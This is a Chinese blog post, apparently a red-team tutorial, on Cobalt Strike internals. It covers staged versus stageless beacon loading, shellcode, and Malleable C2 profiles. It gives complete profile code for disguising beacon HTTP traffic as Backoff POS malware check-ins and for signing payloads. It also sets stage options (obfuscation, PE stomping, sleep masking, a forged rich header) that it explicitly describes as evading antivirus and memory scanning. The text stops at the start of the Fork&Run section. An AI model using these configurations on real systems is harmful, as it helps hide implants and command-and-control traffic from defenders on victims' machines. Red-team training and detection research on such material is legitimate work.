<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="Stage&amp;Stageless作为渗透者，我们现在需要用CS把我们的beacon植入到目标的机器上，无非就是两种情况 1.钓鱼 2.webshell上传beacon 问题在于如果按照默认生成的beacon比较大，目标机器也可能有不挂代理不出网的情况，那么这时候应该怎么办呢 这时候Stage（分段）的思想就应运而生，下图中Stageless就是不分段的，另一个就是Stage  从直观的体积上">
<meta property="og:type" content="article">
<meta property="og:title" content="CS专题">
<meta property="og:url" content="http://example.com/2024/10/08/Cobalt%20Strike/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="Stage&amp;Stageless作为渗透者，我们现在需要用CS把我们的beacon植入到目标的机器上，无非就是两种情况 1.钓鱼 2.webshell上传beacon 问题在于如果按照默认生成的beacon比较大，目标机器也可能有不挂代理不出网的情况，那么这时候应该怎么办呢 这时候Stage（分段）的思想就应运而生，下图中Stageless就是不分段的，另一个就是Stage  从直观的体积上">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006102722220.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006103200255.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006103901335.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006104658244.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006105812149.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006114047642.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006112055157.png">
<meta property="og:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006113524838.png">
<meta property="og:image" content="https://s2.loli.net/2024/10/10/Hs6xTc3JWiYnMCb.png">
<meta property="og:image" content="https://s2.loli.net/2024/10/10/TEfCuXxBMjSVd6v.png">
<meta property="og:image" content="https://s2.loli.net/2024/10/10/arvQTDLNxRMseCm.png">
<meta property="og:image" content="https://s2.loli.net/2024/10/10/GN17iHQLctF6Bgl.png">
<meta property="og:image" content="https://s2.loli.net/2024/10/10/a4Cbg5JuMTVDtlj.png">
<meta property="og:image" content="https://s2.loli.net/2024/10/10/uzeD5KPc8EZbrsk.png">
<meta property="og:image" content="https://s2.loli.net/2024/10/10/SFnzJfutjDohsig.png">
<meta property="og:image" content="https://s2.loli.net/2024/10/10/HCXPr2ZlEdpoSDR.png">
<meta property="og:image" content="https://s2.loli.net/2024/10/10/65AZbxgoXeGtjBO.png">
<meta property="og:image" content="https://s2.loli.net/2024/10/10/stR4Sln2KGBIrcw.png">
<meta property="og:image" content="https://s2.loli.net/2024/10/10/XBRxPt1KQd5wEcV.png">
<meta property="article:published_time" content="2024-10-08T03:50:54.550Z">
<meta property="article:modified_time" content="2024-10-10T07:34:41.421Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="标签">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006102722220.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>CS专题</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- rss -->
    
    
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/posts/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="http://github.com/sergodeeva">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2024/10/08/Dll%E5%8A%AB%E6%8C%81/"><i class="fa fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2024/09/30/%E8%B0%83%E8%AF%95/"><i class="fa fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fa fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/10/08/Cobalt%20Strike/"><i class="fa fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/10/08/Cobalt%20Strike/&text=CS专题"><i class="fa fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/10/08/Cobalt%20Strike/&title=CS专题"><i class="fa fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/10/08/Cobalt%20Strike/&is_video=false&description=CS专题"><i class="fa fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CS专题&body=Check out this article: http://example.com/2024/10/08/Cobalt%20Strike/"><i class="fa fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/10/08/Cobalt%20Strike/&title=CS专题"><i class="fa fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/10/08/Cobalt%20Strike/&title=CS专题"><i class="fa fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/10/08/Cobalt%20Strike/&title=CS专题"><i class="fa fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/10/08/Cobalt%20Strike/&title=CS专题"><i class="fa fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/10/08/Cobalt%20Strike/&name=CS专题&description="><i class="fa fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Stage-Stageless"><span class="toc-number">1.</span> <span class="toc-text">Stage&amp;Stageless</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Shellcode"><span class="toc-number">2.</span> <span class="toc-text">Shellcode</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#C2-profile"><span class="toc-number">3.</span> <span class="toc-text">C2 profile</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%AF%81%E4%B9%A6%E7%94%9F%E6%88%90"><span class="toc-number">3.1.</span> <span class="toc-text">证书生成</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%9B%E5%BB%BAC2-profile%E6%96%87%E4%BB%B6"><span class="toc-number">3.1.1.</span> <span class="toc-text">创建C2.profile文件</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%BC%96%E5%86%99Profile"><span class="toc-number">3.2.</span> <span class="toc-text">编写Profile</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Fork-Run"><span class="toc-number">4.</span> <span class="toc-text">Fork&amp;Run</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#UDRL"><span class="toc-number">5.</span> <span class="toc-text">UDRL</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E4%BA%9B%E7%AE%80%E5%8D%95%E7%9A%84%E4%BA%8C%E5%BC%80"><span class="toc-number">6.</span> <span class="toc-text">一些简单的二开</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#C2-profile%E7%9A%84%E7%BB%A7%E7%BB%AD%E6%B7%B1%E5%85%A5"><span class="toc-number">7.</span> <span class="toc-text">C2 profile的继续深入</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE"><span class="toc-number">7.1.</span> <span class="toc-text">基础配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BC%A0%E8%BE%93%E6%95%B0%E6%8D%AE%E6%9C%80%E5%A4%A7%E5%80%BC%E7%9A%84%E9%85%8D%E7%BD%AE"><span class="toc-number">7.2.</span> <span class="toc-text">传输数据最大值的配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#TCP-Beacon%E9%85%8D%E7%BD%AE"><span class="toc-number">7.3.</span> <span class="toc-text">TCP Beacon配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SMB-Beacon%E9%85%8D%E7%BD%AE"><span class="toc-number">7.4.</span> <span class="toc-text">SMB Beacon配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSH-Beacon%E9%85%8D%E7%BD%AE"><span class="toc-number">7.5.</span> <span class="toc-text">SSH Beacon配置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Http%E5%85%A8%E5%B1%80%E8%AE%BE%E7%BD%AE"><span class="toc-number">7.6.</span> <span class="toc-text">Http全局设置</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Process-Inject"><span class="toc-number">7.7.</span> <span class="toc-text">Process-Inject</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#http-certificate"><span class="toc-number">7.8.</span> <span class="toc-text">http-certificate</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#http-get-http-post"><span class="toc-number">7.9.</span> <span class="toc-text">http-get&amp;http-post</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index width mx-auto px2 my4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        CS专题
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Hexo</span>
      </span>
      
    <div class="postdate">
        <time datetime="2024-10-08T03:50:54.550Z" itemprop="datePublished">2024-10-08</time>
    </div>


      
    <div class="article-tag">
        <i class="fa fa-tag"></i>
        <a class="tag-link-link" href="/tags/%E6%A0%87%E7%AD%BE/" rel="tag">标签</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="Stage-Stageless"><a href="#Stage-Stageless" class="headerlink" title="Stage&amp;Stageless"></a>Stage&amp;Stageless</h1><p>作为渗透者，我们现在需要用CS把我们的beacon植入到目标的机器上，无非就是两种情况</p>
<p><strong>1.钓鱼</strong></p>
<p><strong>2.webshell上传beacon</strong></p>
<p>问题在于如果按照默认生成的beacon比较大，目标机器也可能有不挂代理不出网的情况，那么这时候应该怎么办呢</p>
<p>这时候Stage（分段）的思想就应运而生，下图中Stageless就是不分段的，另一个就是Stage</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006102722220.png" alt="image-20241006102722220"></p>
<p>从直观的体积上来说，两者就有比较大的差距，左边是Stage，右边是Stageless</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006103200255.png" alt="image-20241006103200255"></p>
<p>它们的上线方式也略有不同，这里先不考虑其他的，把杀软什么关干净，先上线</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006103901335.png" alt="image-20241006103901335"></p>
<p>在分段的exe里面有三块Commit内存，我标注了出来</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006104658244.png" alt="image-20241006104658244"></p>
<p>照着这三块内存我们就可以说一下Stage是怎么加载的,我在下面标注了分配步骤的内存大小</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span> 申请一个块儿内存（allocate memory）<span class="comment">//4kb</span></span><br><span class="line"><span class="number">2.</span> 复制Stager去这一块儿内存里</span><br><span class="line"><span class="number">3.</span> 创建一个线程，运行这个Stager</span><br><span class="line"><span class="number">4.</span> 这个Stager会再次申请一块儿内存（allocate memory）<span class="comment">//(abort 300kb)</span></span><br><span class="line"><span class="number">5.</span> Stager去下载加密的payload，写入申请的内存中</span><br><span class="line"><span class="number">6.</span> Stager把执行流程转递给这个加密的payload</span><br><span class="line"><span class="number">7.</span> 加密的payload自解密成Reflective DLL</span><br><span class="line"><span class="number">8.</span> 然后把执行流程传递给Reflective DLL</span><br><span class="line"><span class="number">9.</span> Reflective DLL 申请一个块儿内存（allocate memory）<span class="comment">//(4096kb)</span></span><br><span class="line"><span class="number">10.</span> 然后初始化自己在新的内存里面</span><br><span class="line"><span class="number">11.</span> 最后reflective DLL 调用payload的入口点函数</span><br></pre></td></tr></table></figure>

<p>上面的过程<strong>简而言之</strong>，就是先给Stager申请一块小内存，Stager自己申请一块内存，然后与C2服务器通信将Loader（CS自己实现的等价于LoadLibrary的一个东西）和其他要用到的dll加密成payload发送到机器上，最后在为这些内容申请空间，解密，然后执行加载上线</p>
<p>另一个体积比较大的Stageless则是只申请了两块内存，同样我们在Process Hacker中也可以看见，特征还是比较明显的RWX权限</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006105812149.png" alt="image-20241006105812149"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1.</span> 申请一个块儿内存（allocate memory）</span><br><span class="line"><span class="number">2.</span> 复制stageless去这一块儿内存里</span><br><span class="line"><span class="number">3.</span> 创建一个线程，运行这个stageless</span><br><span class="line"><span class="number">4.</span> Reflective DLL 申请一个块儿内存（allocate memory）</span><br><span class="line"><span class="number">5.</span> 然后初始化自己在新的内存里面</span><br><span class="line"><span class="number">6.</span> 最后reflective DLL 调用payload的入口点函数</span><br></pre></td></tr></table></figure>



<p>讲到这里我们就引出了这两个上线的方法，无论什么方式，它的行为特征是<strong>比较明显</strong>的，就单纯用exe上线是肯定不行的。如果硬要使用，就要加上壳或者是从源码上对生成的beacon端的行为，生成目标等进行二开，抹掉CS本来的特征</p>
<p>随便一说，这些申请的内存里面我们的恶意文件完全没有混淆，是可以看见Java类或者ip这种信息的，不混淆想要躲过内存扫描是非常幽默的</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006114047642.png" alt="image-20241006114047642"></p>
<h1 id="Shellcode"><a href="#Shellcode" class="headerlink" title="Shellcode"></a>Shellcode</h1><p>shellcode是一段与位置无关的代码，首先他是一段二进制编码，由于他的功能常常是返回shell的原因， 所以一般将这样一段代码称为shellcode。</p>
<p><strong>shellcode的关键在于“与位置无关”</strong></p>
<p>在CS中也可以帮助我们去编写一些shellcode，但是这些shellcode本身也是基本遵循上面Stage或者Stageless两种方式进行上线，所以如果裸着还是很容易被查杀的</p>
<h1 id="C2-profile"><a href="#C2-profile" class="headerlink" title="C2 profile"></a>C2 profile</h1><p>为了应对行为检测，Cobalt Strike提供了一个功能Malleable C2 Profile，它让我们可以手动去配置一些操作shellcode中一些字符串的替换，pe文件的敏感标识替换，包括申请内存，注入等等使用的 winapi，shellcode的混淆，配置了C2 profile之后，我们的shellcode就算是没有异或加密也能在一定程度上过杀软</p>
<h2 id="证书生成"><a href="#证书生成" class="headerlink" title="证书生成"></a>证书生成</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">keytool -genkey -alias Bob -keyalg RSA -validity <span class="number">36500</span> -keystore Bob.store</span><br></pre></td></tr></table></figure>

<p>有输入密码的操作需要记住密码</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006112055157.png" alt="image-20241006112055157"></p>
<h3 id="创建C2-profile文件"><a href="#创建C2-profile文件" class="headerlink" title="创建C2.profile文件"></a>创建C2.profile文件</h3><p>这里我给一个示例</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">set</span> sample_name <span class="string">&quot;tryblog POS Malware&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="built_in">set</span> sleeptime <span class="string">&quot;5000&quot;</span>; <span class="meta"># use a ~30s delay between callbacks</span></span><br><span class="line"><span class="built_in">set</span> jitter    <span class="string">&quot;10&quot;</span>;    <span class="meta"># throw in a 10% jitter</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">set</span> useragent <span class="string">&quot;Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0&quot;</span>;</span><br><span class="line"></span><br><span class="line">#设置证书，注意以下内容得和你之前生成的证书一样</span><br><span class="line">https-certificate &#123;</span><br><span class="line">    <span class="built_in">set</span> CN       <span class="string">&quot;Bob&quot;</span>; </span><br><span class="line">    <span class="built_in">set</span> O        <span class="string">&quot;WwW&quot;</span>;   </span><br><span class="line">    <span class="built_in">set</span> C        <span class="string">&quot;dsd&quot;</span>;</span><br><span class="line">    <span class="built_in">set</span> L        <span class="string">&quot;Bankok&quot;</span>;</span><br><span class="line">    <span class="built_in">set</span> OU       <span class="string">&quot;WWw&quot;</span>;  </span><br><span class="line">    <span class="built_in">set</span> ST       <span class="string">&quot;Tosimoli&quot;</span>;</span><br><span class="line">    <span class="built_in">set</span> validity <span class="string">&quot;365&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line">#设置，修改成你的证书名称和证书密码</span><br><span class="line">code-signer&#123;</span><br><span class="line">    <span class="built_in">set</span> keystore <span class="string">&quot;Bob.store&quot;</span>;</span><br><span class="line">    <span class="built_in">set</span> password <span class="string">&quot;1qazxsw2&quot;</span>;</span><br><span class="line">    <span class="built_in">set</span> alias <span class="string">&quot;Bob&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">#指定DNS beacon不用的时候指定到IP地址</span><br><span class="line"><span class="built_in">set</span> dns_idle <span class="string">&quot;8.8.4.4&quot;</span>;</span><br><span class="line"></span><br><span class="line">#每个单独DNS请求前强制睡眠时间</span><br><span class="line"><span class="built_in">set</span> dns_sleep <span class="string">&quot;0&quot;</span>;</span><br><span class="line"></span><br><span class="line">#通过DNS上载数据时主机名的最大长度[<span class="number">0</span><span class="number">-255</span>]</span><br><span class="line"><span class="built_in">set</span> maxdns    <span class="string">&quot;235&quot;</span>;</span><br><span class="line"></span><br><span class="line">http-post &#123;</span><br><span class="line">    <span class="built_in">set</span> uri <span class="string">&quot;/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php&quot;</span>;</span><br><span class="line"></span><br><span class="line">    client &#123;</span><br><span class="line">        header <span class="string">&quot;Accept&quot;</span> <span class="string">&quot;text/plain&quot;</span>;</span><br><span class="line">        header <span class="string">&quot;Accept-Language&quot;</span> <span class="string">&quot;en-us&quot;</span>;</span><br><span class="line">        header <span class="string">&quot;Accept-Encoding&quot;</span> <span class="string">&quot;text/plain&quot;</span>;</span><br><span class="line">        header <span class="string">&quot;Content-Type&quot;</span> <span class="string">&quot;application/x-www-form-urltrytryd&quot;</span>;</span><br><span class="line"></span><br><span class="line">        id &#123;</span><br><span class="line">            netbios;</span><br><span class="line">            parameter <span class="string">&quot;id&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        output &#123;</span><br><span class="line">            base64;</span><br><span class="line">            prepend <span class="string">&quot;&amp;op=1&amp;id=vxeykS&amp;ui=Josh @ PC&amp;wv=11&amp;gr=backoff&amp;bv=1.55&amp;data=&quot;</span>;</span><br><span class="line">            print;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    server &#123;</span><br><span class="line">        output &#123;</span><br><span class="line">            print;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">http-get &#123;</span><br><span class="line">    <span class="built_in">set</span> uri <span class="string">&quot;/updates&quot;</span>;</span><br><span class="line"></span><br><span class="line">    client &#123;</span><br><span class="line">        metadata &#123;</span><br><span class="line">            netbiosu;</span><br><span class="line">            prepend <span class="string">&quot;user=&quot;</span>;</span><br><span class="line">            header <span class="string">&quot;Cookie&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    server &#123;</span><br><span class="line">        header <span class="string">&quot;Content-Type&quot;</span> <span class="string">&quot;text/plain&quot;</span>;</span><br><span class="line"></span><br><span class="line">        output &#123;</span><br><span class="line">            base64;</span><br><span class="line">            print;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>重现上线</p>
<p><img src="C:\Users\su\AppData\Roaming\Typora\typora-user-images\image-20241006113524838.png" alt="image-20241006113524838"></p>
<h2 id="编写Profile"><a href="#编写Profile" class="headerlink" title="编写Profile"></a>编写Profile</h2><p>在自己的Profile里面加入下面内容，这里面有点门道，因为是测试环境，我就随便找了别人写的，但是越多人用，被杀软标记的可能就越高（比如我们的默认C2Profile）</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">stage &#123;</span><br><span class="line">    # 开启混淆，对生成的Beacon shellcode进行混淆</span><br><span class="line">    <span class="built_in">set</span> obfuscate <span class="string">&quot;true&quot;</span>;</span><br><span class="line"></span><br><span class="line">    # 开启PE头覆盖，修改已加载的DLL的PE头部以逃避安全软件的检测</span><br><span class="line">    <span class="built_in">set</span> stomppe <span class="string">&quot;true&quot;</span>;</span><br><span class="line"></span><br><span class="line">    # 开启清理功能，清理为Beacon加载而创建的资源，如线程和句柄</span><br><span class="line">    <span class="built_in">set</span> cleanup <span class="string">&quot;true&quot;</span>;</span><br><span class="line"></span><br><span class="line">    # 让分配给Beacon的内存区域同时具有读、写和执行权限</span><br><span class="line">    <span class="built_in">set</span> userwx <span class="string">&quot;true&quot;</span>;</span><br><span class="line"></span><br><span class="line">    # 开启智能注入，尝试避免在注入Beacon时引起异常</span><br><span class="line">    <span class="built_in">set</span> smartinject <span class="string">&quot;true&quot;</span>;</span><br><span class="line">    </span><br><span class="line">    # 在负载处于休眠状态时，对内存中的Beacon负载进行操作，改变其内存中的表现形式，使其更难被检测</span><br><span class="line">    <span class="built_in">set</span> sleep_mask <span class="string">&quot;true&quot;</span>;</span><br><span class="line">    </span><br><span class="line">    # 设置内存分配器的类型，使用Windows API中的<span class="string">&quot;VirtualAlloc&quot;</span>函数</span><br><span class="line">    <span class="built_in">set</span> allocator <span class="string">&quot;VirtualAlloc&quot;</span>;</span><br><span class="line"></span><br><span class="line">    # 定义用于替换Beacon反射性DLL的PE头的自定义字节</span><br><span class="line">    <span class="built_in">set</span> magic_pe <span class="string">&quot;LE&quot;</span>;</span><br><span class="line"></span><br><span class="line">    # 定义PE头部的各个属性</span><br><span class="line">    <span class="built_in">set</span> checksum       <span class="string">&quot;0&quot;</span>;  # 设置PE头部的校验和</span><br><span class="line">    <span class="built_in">set</span> entry_point    <span class="string">&quot;13760&quot;</span>;  # 设置PE头部的入口点</span><br><span class="line">    <span class="built_in">set</span> image_size_x86 <span class="string">&quot;548864&quot;</span>;  # 设置PE头部的图像大小（x86）</span><br><span class="line">    <span class="built_in">set</span> image_size_x64 <span class="string">&quot;548864&quot;</span>;  # 设置PE头部的图像大小（x64）</span><br><span class="line">    <span class="built_in">set</span> name           <span class="string">&quot;wwanapi.dll&quot;</span>;  # 设置PE头部的名称</span><br><span class="line"></span><br><span class="line">    # 设置用于替换Beacon反射性DLL的Rich Header的自定义字节</span><br><span class="line">    <span class="built_in">set</span> rich_header    <span class="string">&quot;\x39\x39\x83\xe8\x7d\x58\xed\xbb\x7d\x58\xed\xbb\x7d\x58\xed\xbb\x74\x20\x7e\xbb\x3b\x58\xed\xbb\x26\x30\xee\xba\x7e\x58\xed\xbb\x26\x30\xe9\xba\x69\x58\xed\xbb\x7d\x58\xec\xbb\xbf\x58\xed\xbb\x26\x30\xec\xba\x78\x58\xed\xbb\x26\x30\xe8\xba\x71\x58\xed\xbb\x26\x30\xed\xba\x7c\x58\xed\xbb\x26\x30\xe3\xba\x1f\x58\xed\xbb\x26\x30\x12\xbb\x7c\x58\xed\xbb\x26\x30\xef\xba\x7c\x58\xed\xbb\x52\x69\x63\x68\x7d\x58\xed\xbb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="Fork-Run"><a href="#Fork-Run" class="headerlink" title="Fork&amp;Run"></a>Fork&amp;Run</h1><p>这指的是一种执行模式，我们下发某些命令给beacon时，他的执行流程是通过新起一个进程，然后将某 些功能注入到新起的进程中执行，最后通过管道将执行结果回传。</p>
<p>cobalt strike这样做的原因有很多：</p>
